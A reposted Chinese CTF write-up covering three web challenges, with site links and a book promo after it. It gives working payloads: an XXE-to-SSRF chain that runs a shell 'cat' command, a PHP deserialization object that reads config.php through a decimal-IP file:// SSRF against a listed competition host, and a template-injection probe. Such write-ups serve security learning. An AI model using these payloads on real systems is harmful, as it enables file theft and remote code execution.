内容简介:根据URL可以猜测存在任意文件下载漏洞并且hash值为file的md5加密,根据提示下载源码在路由文件中发现几个关键点
Bad Injections
根据URL可以猜测存在任意文件下载漏洞并且hash值为file的md5加密,根据提示下载源码
在路由文件中发现几个关键点
跟进这个类发现存在XXE
这里想到还有一个只能通过SSRF才能访问到的admin,于是跟进admin文件发现存在代码执行
于是想到利用XXE来构造这个代码执行,这里要注意的是服务器出现 } 就会报 parser error : Invalid URI ,所以我们需要编码一下。最终payload
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ENTITY xxe SYSTEM "http://localhost/admin?rss=http://www.lovei.org/sitemap.xmlℴ=%6c%69%6e%6b%29%3b%7d%73%79%73%74%65%6d%28%22%63%61%74%20%2f%64%61%30%66%37%32%64%35%64%37%39%31%36%39%39%37%31%62%36%32%61%34%37%39%63%33%34%31%39%38%65%37%22%29%3b%2f%2f" >]> <root> <name>&xxe;</name> </root>
Vice
题目思路应该蛮明确反序列+SSRF,这里有几个限制所以我们使用file协议读文件, 127.0.0.2 绕过 127.0.0.1 的检测,然后将ip十进制编码绕过 . 检测最后进入URL编码
<?php
class SHITS{
private $url;
private $method;
function __construct(){
$this->method = "doit";
$this->url = "file://2130706434/var/www/html/config%2ephp";
}
}
$a = new SHITS();
echo urlencode(serialize($a));
?>
最终payload:
http://68.183.31.62:991/?gg=O%3A5%3A%22SHITS%22%3A2%3A%7Bs%3A10%3A%22%00SHITS%00url%22%3Bs%3A43%3A%22file%3A%2F%2F2130706434%2Fvar%2Fwww%2Fhtml%2Fconfig%252ephp%22%3Bs%3A13%3A%22%00SHITS%00method%22%3Bs%3A4%3A%22doit%22%3B%7D
Super-easy web dog
这道题一开始没做出来,最后知道真相的我眼泪掉下来
看到这个之后果断跑去题目试了 {{$.Request}} 然后???然后这就出来了?眼泪掉了下来
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- 你负责人工智能哪部分?人工那部分;知识图谱的构建主要靠人工还是机器?
- cocosdx接bugly,上传符号表,有一部分内容解析出来了, 另一部分没有解析出来
- GO的部分总结~
- MySQL基础部分总结
- python字典实例(部分)
- DDCTF2018 部分writeup
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
产品经理全栈运营实战笔记
林俊宇 / 化学工业出版社 / 49.8元
本书凝结作者多年的产品运营经验,读者会看到很多创业公司做运营的经验,书中列举了几十个互联网产品的运营案例去解析如何真正做好一个产品的冷启动到发展期再到平稳期。本书主要分为六篇:互联网运营的全面貌;我的运营生涯;后产品时代的运营之道;揭秘刷屏事件的背后运营;技能学习;深度思考。本书有很多关于产品运营的基础知识,会帮助你做好、做透。而且将理论和作者自己的案例以及其他人的运营案例结合起来,会让读者更容易......一起来看看 《产品经理全栈运营实战笔记》 这本书的介绍吧!